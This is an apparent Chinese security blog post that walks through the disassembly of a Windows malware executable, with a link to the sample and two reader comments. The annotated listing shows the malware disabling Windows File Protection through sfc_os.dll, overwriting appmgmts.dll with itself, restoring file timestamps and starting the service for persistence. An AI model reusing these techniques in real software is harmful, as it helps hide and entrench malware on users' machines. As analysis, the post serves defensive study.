六
16
样本下载:http://vip.begin09.com/thread-5745-1-1.html
只分析了exe运行的情况,关闭windows文件保护,更改自身属性为DLL,写入C:\WINDOWS\system32\appmgmts.dll并以服务方式启动,dll下次在分析,今天没时间了~
00401B9A |. 6A 1C push 1C ; /BufSize = 1C (28.) 00401B9C |. 8D45 E4 lea eax, dword ptr [ebp-1C] ; | 00401B9F |. 50 push eax ; |Buffer 00401BA0 |. FF75 E0 push dword ptr [ebp-20] ; |Address 00401BA3 |. FF15 2C914000 call dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery 00401BA9 |. 8B45 E8 mov eax, dword ptr [ebp-18] ; VirTualQuery获取内存信息 00401BAC |. A3 38DC4000 mov dword ptr [40DC38], eax 00401BB1 |. 6A 00 push 0 ; /pModule = NULL 00401BB3 |. FF15 04914000 call dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA 00401BB9 |. 3B05 38DC4000 cmp eax, dword ptr [40DC38] ; GetModuleHandle获取当前模块基址 00401BBF |. 75 16 jnz short 00401BD7 ; 两者比较,不要相等则退出线程
00402056 . FF15 14924000 call dword ptr [<&USER32.GetInputStat>; [GetInputState 0040205C . 6A 00 push 0 ; /lParam = 0 0040205E . 6A 00 push 0 ; |wParam = 0 00402060 . 6A 00 push 0 ; |Message = WM_NULL 00402062 . FF15 48914000 call dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId 00402068 . 50 push eax ; |ThreadId 00402069 . FF15 18924000 call dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA 0040206F . 6A 00 push 0 ; /MsgFilterMax = 0 00402071 . 6A 00 push 0 ; |MsgFilterMin = 0 00402073 . 6A 00 push 0 ; |hWnd = NULL 00402075 . 8D85 BCFDFFFF lea eax, dword ptr [ebp-244] ; | 0040207B . 50 push eax ; |pMsg 0040207C . FF15 0C924000 call dword ptr [<&USER32.GetMessageA>>; \GetMessageA [/courcecode] [sourcecode] 004064B4 |. 68 04010000 push 104 ; /BufSize = 104 (260.) 004064B9 |. 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; | 004064BF |. 50 push eax ; |PathBuffer 004064C0 |. 6A 00 push 0 ; |hModule = NULL 004064C2 |. FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA 004064C8 |. 68 04010000 push 104 ; /获取当前路径 004064CD |. 6A 00 push 0 ; |c = 00 004064CF |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] ; | 004064D5 |. 50 push eax ; |s 004064D6 |. E8 67290000 call <jmp.&MSVCRT.memset> ; \memset 004064DB |. 83C4 0C add esp, 0C 004064DE |. 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] 004064E4 |. 50 push eax ; /String2 004064E5 |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] ; | 004064EB |. 50 push eax ; |String1 004064EC |. FF15 1C914000 call dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA 004064F2 |. 68 01010000 push 101 ; /n = 101 (257.) 004064F7 |. 6A 00 push 0 ; |c = 00 004064F9 |. 8D85 E3FEFFFF lea eax, dword ptr [ebp-11D] ; | 004064FF |. 50 push eax ; |s 00406500 |. E8 3D290000 call <jmp.&MSVCRT.memset> ; \memset 00406505 |. 83C4 0C add esp, 0C ; 保留路径前三个字节(获取当前磁盘) 00406508 |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] 0040650E |. 50 push eax ; /RootPathName 0040650F |. FF15 A4904000 call dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA 00406515 |. 83F8 02 cmp eax, 2 ; 判断当前磁盘类型 00406518 |. 75 39 jnz short 00406553 ; --------------------------------- 0040651A |. 8D85 E0FEFFFF lea eax, dword ptr [ebp-120] 00406520 |. 50 push eax ; /<%s> 00406521 |. 68 A09A4000 push 00409AA0 ; |Format = "/n,%s" 00406526 |. 8D85 98FDFFFF lea eax, dword ptr [ebp-268] ; | 0040652C |. 50 push eax ; |s 0040652D |. FF15 10924000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA 00406533 |. 83C4 0C add esp, 0C 00406536 |. 6A 05 push 5 ; /IsShown = 5 00406538 |. 6A 00 push 0 ; |DefDir = NULL 0040653A |. 8D85 98FDFFFF lea eax, dword ptr [ebp-268] ; | 00406540 |. 50 push eax ; |Parameters 00406541 |. 68 A89A4000 push 00409AA8 ; |FileName = "explorer.exe" 00406546 |. 68 B89A4000 push 00409AB8 ; |Operation = "open" 0040654B |. 6A 00 push 0 ; |hWnd = NULL 0040654D |. FF15 E4914000 call dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA 00406553 |> C745 EC C09A4>mov dword ptr [ebp-14], 00409AC0 ; ---如果为移动设备则打explorer--- 00401681 |> \6A 00 push 0 ; /hTemplateFile = NULL 00401683 |. 68 80000000 push 80 ; |Attributes = NORMAL 00401688 |. FFB5 E8FEFFFF push dword ptr [ebp-118] ; |Mode 0040168E |. 6A 00 push 0 ; |pSecurity = NULL 00401690 |. 6A 03 push 3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE 00401692 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE 00401697 |. 68 08934000 push 00409308 ; |FileName = "C:\DelInfo.bin" 0040169C |. FF15 C4904000 call dword ptr [<&KERNEL32.CreateFile>; \CreateFileA 004016A2 |. 8985 ECFEFFFF mov dword ptr [ebp-114], eax ; 创建文件C:\Delinfo.bin
0040175C |> \6A 00 push 0 ; /pOverlapped = NULL 0040175E |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401761 |. 50 push eax ; |pBytesWritten 00401762 |. 6A 04 push 4 ; |nBytesToWrite = 4 00401764 |. 8D45 0C lea eax, dword ptr [ebp+C] ; | 00401767 |. 50 push eax ; |Buffer 00401768 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; |hFile 0040176E |. FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 00401774 |. 6A 00 push 0 ; /写入01000000 00401776 |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401779 |. 50 push eax ; |pBytesWritten 0040177A |. FF75 08 push dword ptr [ebp+8] ; |/String 0040177D |. FF15 D0904000 call dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA 00401783 |. 50 push eax ; |nBytesToWrite 00401784 |. FF75 08 push dword ptr [ebp+8] ; |Buffer 00401787 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; |hFile 0040178D |. FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>>; \WriteFile 00401793 |. FFB5 ECFEFFFF push dword ptr [ebp-114] ; /01000000之后写入自身路径 00401799 |. FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401C0B |. 68 04010000 push 104 ; /BufSize = 104 (260.) 00401C10 |. 8D85 E8FEFFFF lea eax, dword ptr [ebp-118] ; | 00401C16 |. 50 push eax ; |PathBuffer 00401C17 |. FF75 08 push dword ptr [ebp+8] ; |hModule 00401C1A |. FF15 00914000 call dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA 00401C20 |. 83A5 E0FEFFFF>and dword ptr [ebp-120], 0 ; 获取路径 00401C27 |. EB 0D jmp short 00401C36 00401C29 |> 8B85 E0FEFFFF /mov eax, dword ptr [ebp-120] 00401C2F |. 40 |inc eax 00401C30 |. 8985 E0FEFFFF |mov dword ptr [ebp-120], eax 00401C36 |> 83BD E0FEFFFF> cmp dword ptr [ebp-120], 32 00401C3D |. 7D 31 |jge short 00401C70 00401C3F |. 6A 00 |push 0 ; /hTemplateFile = NULL 00401C41 |. 6A 00 |push 0 ; |Attributes = 0 00401C43 |. 6A 03 |push 3 ; |Mode = OPEN_EXISTING 00401C45 |. 6A 00 |push 0 ; |pSecurity = NULL 00401C47 |. 6A 01 |push 1 ; |ShareMode = FILE_SHARE_READ 00401C49 |. 68 00000080 |push 80000000 ; |Access = GENERIC_READ 00401C4E |. 8D85 E8FEFFFF |lea eax, dword ptr [ebp-118] ; | 00401C54 |. 50 |push eax ; |FileName 00401C55 |. FF15 C4904000 |call dword ptr [<&KERNEL32.CreateFil>; \CreateFileA 00401C5B |. 8945 F4 |mov dword ptr [ebp-C], eax ; 打开自身 00401C70 |> \6A 00 push 0 ; /pFileSizeHigh = NULL 00401C72 |. FF75 F4 push dword ptr [ebp-C] ; |hFile 00401C75 |. FF15 24914000 call dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize 00401C7B |. 8945 F8 mov dword ptr [ebp-8], eax ; 得到自身大小 00401CEF |. 6A 00 push 0 ; /pOverlapped = NULL 00401CF1 |. 8D45 FC lea eax, dword ptr [ebp-4] ; | 00401CF4 |. 50 push eax ; |pBytesRead 00401CF5 |. FF75 F8 push dword ptr [ebp-8] ; |BytesToRead 00401CF8 |. FFB5 E4FEFFFF push dword ptr [ebp-11C] ; |Buffer 00401CFE |. FF75 F4 push dword ptr [ebp-C] ; |hFile 00401D01 |. FF15 EC904000 call dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile 00401D07 |. FF75 F4 push dword ptr [ebp-C] ; /把自身读入缓冲区 00401D0A |. FF15 10914000 call dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004020AE . 68 04010000 push 104 ; /BufSize = 104 (260.) 004020B3 . 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; | 004020B9 . 50 push eax ; |Buffer 004020BA . FF15 38914000 call dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA 004020C0 . 68 04010000 push 104 ; /得到系统目录 004020C5 . 6A 00 push 0 ; |c = 00 004020C7 . 8D85 E8FEFFFF lea eax, dword ptr [ebp-118] ; | 004020CD . 50 push eax ; |s 004020CE . E8 6F6D0000 call <jmp.&MSVCRT.memset> ; \memset 004020D3 . 83C4 0C add esp, 0C 004020D6 . 8D85 E8FEFFFF lea eax, dword ptr [ebp-118] 004020DC . 50 push eax ; /Buffer 004020DD . 68 04010000 push 104 ; |BufSize = 104 (260.) 004020E2 . FF15 4C914000 call dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA 004020E8 . 68 3F000F00 push 0F003F ; 得到临时目录
04020ED . 6A 00 push 0 004020EF . 6A 00 push 0 004020F1 . FF15 18904000 call dword ptr [<&ADVAPI32.OpenSCMana>; ADVAPI32.OpenSCManagerA 004020F7 . 8945 FC mov dword ptr [ebp-4], eax ; 打开scm 004020FA . 68 B0944000 push 004094B0 ; /FileName = "sfc_os.dll" 004020FF . FF15 40914000 call dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA 00402105 . 8985 B4F9FFFF mov dword ptr [ebp-64C], eax ; 加载sfc_os.dll 0040211E > \6A 05 push 5 ; /ProcNameOrOrdinal = #5 00402120 . FFB5 B4F9FFFF push dword ptr [ebp-64C] ; |hModule 00402126 . FF15 F4904000 call dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress 0040212C . A3 44DC4000 mov dword ptr [40DC44], eax ; 获取SetSfcFileException
004021B8 > \68 FF010F00 push 0F01FF 004021BD . 8D85 30F4FFFF lea eax, dword ptr [ebp-BD0] 004021C3 . 50 push eax 004021C4 . FF75 FC push dword ptr [ebp-4] 004021C7 . FF15 14904000 call dword ptr [<&ADVAPI32.OpenServic>; ADVAPI32.OpenServiceA 004021CD . 8985 E0FEFFFF mov dword ptr [ebp-120], eax ; 打开AppMgmt(服务管理器) 004021FA . 50 push eax 004021FB . FFB5 E0FEFFFF push dword ptr [ebp-120] 00402201 . FF15 04904000 call dword ptr [<&ADVAPI32.QueryServi>; ADVAPI32.QueryServiceStatus 00402207 . 83BD D8F3FFFF>cmp dword ptr [ebp-C28], 1 ; 查询服务状态 0040225C . 8D85 F0F3FFFF lea eax, dword ptr [ebp-C10] 00402262 . 50 push eax ; /<%s> 00402263 . 8D85 D8FDFFFF lea eax, dword ptr [ebp-228] ; | 00402269 . 50 push eax ; |<%s> 0040226A . 68 BC944000 push 004094BC ; |Format = "%s\system32\%s.dll" 0040226F . 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] ; | 00402275 . 50 push eax ; |s 00402276 . FF15 10924000 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA 0040227C . 83C4 10 add esp, 10 ; 构造字符串C:\WINDOWS\system32\appmgmts.dll 0040227F . 8D85 A8F8FFFF lea eax, dword ptr [ebp-758] 00402285 . 50 push eax 00401E53 . FF75 08 push dword ptr [ebp+8] ; /Path = "C:\WINDOWS\system32\appmgmts.dll" 00401E56 . FF15 F0914000 call dword ptr [<&SHLWAPI.PathFileExistsA>] ; \PathFileExistsA 00401E5C . 83F8 01 cmp eax, 1 ; 判断C:\WINDOWS\system32\appmgmts.dll是否存在 00401E91 . FFB5 B4F7FFFF push dword ptr [ebp-84C] ; /WideBufSize 00401E97 . 8D85 B8F7FFFF lea eax, dword ptr [ebp-848] ; | 00401E9D . 50 push eax ; |WideCharBuf 00401E9E . FFB5 B4F7FFFF push dword ptr [ebp-84C] ; |StringSize 00401EA4 . FF75 08 push dword ptr [ebp+8] ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll" 00401EA7 . 6A 00 push 0 ; |Options = 0 00401EA9 . 6A 00 push 0 ; |CodePage = CP_ACP 00401EAB . FF15 98904000 call dword ptr [<&KERNEL32.MultiByteToWideChar>] ; \MultiByteToWideChar 00401EB1 . 8365 FC 00 and dword ptr [ebp-4], 0 ; 转换"C:\WINDOWS\system32\appmgmts.dll"成unicode 00401EB5 . 6A FF push -1 00401EB7 . 8D85 B8F7FFFF lea eax, dword ptr [ebp-848] 00401EBD . 50 push eax 00401EBE . 6A 00 push 0 00401EC0 . 68 F91E4000 push 00401EF9 00401EC5 . 8BFF mov edi, edi 00401EC7 . 55 push ebp 00401EC8 . A1 44DC4000 mov eax, dword ptr [40DC44] 00401ECD . 83C0 03 add eax, 3 00401ED0 . FFE0 jmp eax ; 关闭windows文件保护
0401F14 > \6A 00 push 0 ; /hTemplateFile = NULL 00401F16 . 6A 00 push 0 ; |Attributes = 0 00401F18 . FF75 D0 push dword ptr [ebp-30] ; |Mode 00401F1B . 6A 00 push 0 ; |pSecurity = NULL 00401F1D . 6A 00 push 0 ; |ShareMode = 0 00401F1F . 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE 00401F24 . FF75 08 push dword ptr [ebp+8] ; |FileName 00401F27 . FF15 C4904000 call dword ptr [<&KERNEL32.CreateFileA>] ; \CreateFileA 00401F2D . 8945 D4 mov dword ptr [ebp-2C], eax ; 打开C:\WINDOWS\system32\appmgmts.dll 00401F50 . 50 push eax ; /pLastWrite = 0012F304 00401F51 . 8D45 C0 lea eax, dword ptr [ebp-40] ; | 00401F54 . 50 push eax ; |pLastAccess 00401F55 . 8D45 B8 lea eax, dword ptr [ebp-48] ; | 00401F58 . 50 push eax ; |pCreationTime 00401F59 . FF75 D4 push dword ptr [ebp-2C] ; |hFile 00401F5C . FF15 44914000 call dword ptr [<&KERNEL32.GetFileTime>] ; \GetFileTime 00401F62 . 837D D0 02 cmp dword ptr [ebp-30], 2 ; 获取文件时间 00401F9A > \6A 00 push 0 ; /Origin = FILE_BEGIN 00401F9C . 6A 00 push 0 ; |pOffsetHi = NULL 00401F9E . FF75 DC push dword ptr [ebp-24] ; |OffsetLo 00401FA1 . FF75 D4 push dword ptr [ebp-2C] ; |hFile 00401FA4 . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer 00401FAA . A1 3CDC4000 mov eax, dword ptr [40DC3C] ; 设置文件指针到文件偏移3C 00401FAF . 0345 DC add eax, dword ptr [ebp-24] 00401FB2 . 8945 E4 mov dword ptr [ebp-1C], eax 00401FB5 . 6A 00 push 0 ; /pOverlapped = NULL 00401FB7 . 8D45 D8 lea eax, dword ptr [ebp-28] ; | 00401FBA . 50 push eax ; |pBytesWritten 00401FBB . A1 40DC4000 mov eax, dword ptr [40DC40] ; | 00401FC0 . 2B45 DC sub eax, dword ptr [ebp-24] ; | 00401FC3 . 50 push eax ; |nBytesToWrite 00401FC4 . FF75 E4 push dword ptr [ebp-1C] ; |Buffer 00401FC7 . FF75 D4 push dword ptr [ebp-2C] ; |hFile 00401FCA . FF15 E0904000 call dword ptr [<&KERNEL32.WriteFile>] ; \WriteFile 00401FD0 . 85C0 test eax, eax ; 写入数据C:\WINDOWS\system32\appmgmts.dll 00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN 00401FE3 . 6A 00 push 0 ; |pOffsetHi = NULL 00401FE5 . FF35 40DC4000 push dword ptr [40DC40] ; |OffsetLo = 3CC00 (248832.) 00401FEB . FF75 D4 push dword ptr [ebp-2C] ; |hFile 00401FEE . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer 00401FF4 . FF75 D4 push dword ptr [ebp-2C] ; /hFile 00401FF7 . FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile 00401FE1 > \6A 00 push 0 ; /Origin = FILE_BEGIN 00401FE3 . 6A 00 push 0 ; |pOffsetHi = NULL 00401FE5 . FF35 40DC4000 push dword ptr [40DC40] ; |OffsetLo = 3CC00 (248832.) 00401FEB . FF75 D4 push dword ptr [ebp-2C] ; |hFile 00401FEE . FF15 28914000 call dword ptr [<&KERNEL32.SetFilePointer>] ; \SetFilePointer 00401FF4 . FF75 D4 push dword ptr [ebp-2C] ; /hFile 00401FF7 . FF15 30914000 call dword ptr [<&KERNEL32.SetEndOfFile>] ; \SetEndOfFile 00401FFD . 8D45 C8 lea eax, dword ptr [ebp-38] ; 把自身写进C:\WINDOWS\system32\appmgmts.dll 00402000 . 50 push eax ; /pLastWrite 00402001 . 8D45 C0 lea eax, dword ptr [ebp-40] ; | 00402004 . 50 push eax ; |pLastAccess 00402005 . 8D45 B8 lea eax, dword ptr [ebp-48] ; | 00402008 . 50 push eax ; |pCreationTime 00402009 . FF75 D4 push dword ptr [ebp-2C] ; |hFile 0040200C . FF15 34914000 call dword ptr [<&KERNEL32.SetFileTime>] ; \SetFileTime 00402012 . FF75 D4 push dword ptr [ebp-2C] ; 还原设置文件时间
00402293 > \6A 00 push 0 00402295 . 6A 00 push 0 00402297 . FFB5 E0FEFFFF push dword ptr [ebp-120] 0040229D . FF15 24904000 call dword ptr [<&ADVAPI32.StartServiceA>] ; ADVAPI32.StartServiceA启动服务
SyntaxHighlighter Evolved
用这个插件贴代码吧大零度~~
一击屠夫 回复:
六月 17th, 2010 at 17:24
这么看实在太费劲了。。
零度x 回复:
六月 17th, 2010 at 22:56
谨遵屠夫兄教诲~
屠夫兄也有这爱好?